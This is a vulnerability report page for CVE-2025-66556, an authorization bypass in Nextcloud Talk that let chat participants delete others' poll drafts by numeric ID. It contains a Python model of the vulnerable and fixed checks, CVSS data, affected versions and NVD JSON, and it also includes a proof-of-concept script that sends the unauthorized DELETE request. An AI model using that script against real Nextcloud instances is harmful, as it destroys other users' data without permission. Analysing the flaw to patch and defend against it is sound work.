Security Vulnerability Report
CVE-2025-66556 CVSS 3.5 LOW

CVE-2025-66556

Published: 2025-12-05 18:15:59
Last Modified: 2025-12-09 16:52:35

Description

Nextcloud Talk is a video and audio conferencing app for Nextcloud. Before 20.1.8 and 21.1.2, a participant with chat permissions could delete the poll drafts of other participants in the same conversation by referencing a draft by its numeric ID: the delete path checked the caller's chat permission but not whether the caller owned the draft (CWE-639, authorization bypass through a user-controlled key). The issue is fixed in 20.1.8 and 21.1.2.
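The authorization flaw in miniature, as an added illustration that is not Nextcloud Talk's own code: an in-memory model of a conversation holding poll drafts, with a delete handler that only checks the caller's chat permission (the pre-fix behaviour the advisory describes) beside one that also requires the caller to own the draft. The class names, the permission bit, the sample actors and the choice of exception types are this example's assumptions.

```python
"""Model of the authorization check behind CVE-2025-66556 (CWE-639).

Added illustration, not Nextcloud Talk's code. Everything here (class
names, the permission bit, the sample conversation) is constructed.
"""
from dataclasses import dataclass, field

CHAT_PERMISSION = 1 << 3  # hypothetical "may post in chat" permission bit


@dataclass(frozen=True)
class Actor:
    actor_type: str  # e.g. "users" or "guests"
    actor_id: str


@dataclass
class PollDraft:
    poll_id: int
    owner: Actor
    question: str
    is_draft: bool = True


@dataclass
class Conversation:
    token: str
    permissions: dict  # Actor -> permission bitmask
    drafts: dict = field(default_factory=dict)  # poll_id -> PollDraft


def _require_chat_permission(conv, actor):
    if not conv.permissions.get(actor, 0) & CHAT_PERMISSION:
        raise PermissionError("actor has no chat permission in this conversation")


def delete_draft_vulnerable(conv, actor, poll_id):
    """Pre-fix behaviour: any participant with chat permission may delete
    any draft in the conversation just by knowing its numeric ID."""
    _require_chat_permission(conv, actor)
    if poll_id not in conv.drafts:
        raise LookupError("no such draft")
    del conv.drafts[poll_id]
    return True


def delete_draft_fixed(conv, actor, poll_id):
    """Hardened: the draft must belong to the caller. Ownership is compared
    as the (actor_type, actor_id) pair so a guest and a user sharing an ID
    string are not confused. A foreign draft gets the same response as a
    missing one, so the caller cannot enumerate other participants' drafts."""
    _require_chat_permission(conv, actor)
    draft = conv.drafts.get(poll_id)
    if draft is None or not draft.is_draft or draft.owner != actor:
        raise LookupError("no such draft")
    del conv.drafts[poll_id]
    return True


def build_sample_conversation():
    """Constructed sample: two users with chat permission, one draft each."""
    alice = Actor("users", "alice")
    bob = Actor("users", "bob")
    conv = Conversation(
        token="abc123",
        permissions={alice: CHAT_PERMISSION, bob: CHAT_PERMISSION},
    )
    conv.drafts[7] = PollDraft(7, alice, "Lunch on Friday?")
    conv.drafts[8] = PollDraft(8, bob, "Release on Monday?")
    return conv, alice, bob


def demo():
    """Returns (vulnerable_deleted_foreign_draft, fixed_blocked_foreign, fixed_allowed_own)."""
    conv, alice, bob = build_sample_conversation()
    vulnerable = delete_draft_vulnerable(conv, bob, 7)  # bob removes alice's draft

    conv, alice, bob = build_sample_conversation()
    try:
        delete_draft_fixed(conv, bob, 7)
        blocked = False
    except LookupError:
        blocked = 7 in conv.drafts  # alice's draft survived
    allowed_own = delete_draft_fixed(conv, bob, 8) and 8 not in conv.drafts
    return vulnerable, blocked, allowed_own


if __name__ == "__main__":
    print(demo())
```

The fixed variant keys ownership on the actor pair rather than on a display name or a bare numeric ID, and it deliberately does not distinguish "not yours" from "not found" in its response.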

CVSS Details

CVSS Score
3.5 (CNA, secondary metric) / 4.3 (NVD analysis, primary metric)
Severity
LOW (3.5) / MEDIUM (4.3)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N (CNA, 3.5)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (NVD, 4.3)
The two vectors differ only in User Interaction (CNA: required; NVD: none); both agree on low privileges required, network attack vector and a low integrity impact with no confidentiality or availability impact.
Weakness
CWE-639 (Authorization Bypass Through User-Controlled Key)

Configurations (Affected Products)

cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:* - VULNERABLE, 20.0.0 <= version < 20.1.8
cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:* - VULNERABLE, 21.0.0 <= version < 21.1.2
Fixed in Nextcloud Talk 20.1.8 and 21.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66556 PoC - Nextcloud Talk Poll Draft Deletion
# Requires: a valid session with chat permission in the conversation, and the
# numeric ID of another participant's poll draft.
# Note: the endpoint paths below are the ones given on this page; check them
# against the Talk OCS API documentation for the target version before use.
import requests

# Configuration
NEXTCLOUD_URL = "https://your-nextcloud-instance"
SESSION_TOKEN = "your-session-token"
CONVERSATION_TOKEN = "conversation-token-here"
TARGET_POLL_ID = 12345  # Numeric ID of another participant's poll draft

HEADERS = {
    "OCS-APIREQUEST": "true",
    "Authorization": f"Bearer {SESSION_TOKEN}",
    "Accept": "application/json",
}


# Step 1: List the participants of the conversation (confirms the attacker
# account is itself a participant of the target conversation).
def get_participants():
    url = f"{NEXTCLOUD_URL}/ocs/v2.php/spreed/conversations/{CONVERSATION_TOKEN}/participants"
    response = requests.get(url, headers=HEADERS)
    response.raise_for_status()
    return response.json()


# Step 2: Create a poll draft. Run this as the victim account to produce a
# draft whose numeric ID can then be targeted from the attacker account.
def create_poll_draft():
    url = f"{NEXTCLOUD_URL}/ocs/v2.php/spreed/polls"
    data = {
        "conversationToken": CONVERSATION_TOKEN,
        "question": "Test Poll",
        "options": ["Option 1", "Option 2"],
        "draft": True,
    }
    response = requests.post(url, headers=HEADERS, json=data)
    response.raise_for_status()
    return response.json()


# Step 3: Delete a poll draft by numeric ID from the attacker account.
# The vulnerability: before 20.1.8 / 21.1.2 the server checked only the
# caller's chat permission, not that the caller owned the draft.
def delete_poll_draft(poll_id):
    url = f"{NEXTCLOUD_URL}/ocs/v2.php/spreed/polls/{poll_id}"
    response = requests.delete(url, headers=HEADERS)
    return response.status_code == 200


# Main execution
if __name__ == "__main__":
    print("Fetching participants...")
    participants = get_participants()
    print(f"Found {len(participants.get('ocs', {}).get('data', []))} participants")

    print("\nDeleting the target participant's poll draft...")
    success = delete_poll_draft(TARGET_POLL_ID)
    print(f"Poll draft deletion {'successful' if success else 'failed'}")

References

https://github.com/nextcloud/security-advisories/security/advisories/GHSA-pr9f-vqgg-m2jh (Patch, Vendor Advisory)
https://github.com/nextcloud/spreed/commit/bd68e80d1dea98d84c1d621c2c681238cf041725 (Patch)
https://github.com/nextcloud/spreed/pull/15532 (Issue Tracking, Patch)
https://hackerone.com/reports/3247386 (Issue Tracking, Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66556", "sourceIdentifier": "[email protected]", "published": "2025-12-05T18:15:58.803", "lastModified": "2025-12-09T16:52:34.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud talk is a video & audio conferencing app for Nextcloud. Prior to 20.1.8 and 21.1.2, a participant with chat permissions was able to delete poll drafts of other participants within the conversation based on their numeric ID. This vulnerability is fixed in 20.1.8 and 21.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.0.0", "versionEndExcluding": "20.1.8", "matchCriteriaId": "5D5909D1-F39C-4C41-906C-2D2A7C830F0A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:talk:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0.0", "versionEndExcluding": "21.1.2", "matchCriteriaId": "D2E99EC0-4563-4497-A72C-52C97089F7E1"}]}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-pr9f-vqgg-m2jh", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://github.com/nextcloud/spreed/commit/bd68e80d1dea98d84c1d621c2c681238cf041725", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/spreed/pull/15532", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://hackerone.com/reports/3247386", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}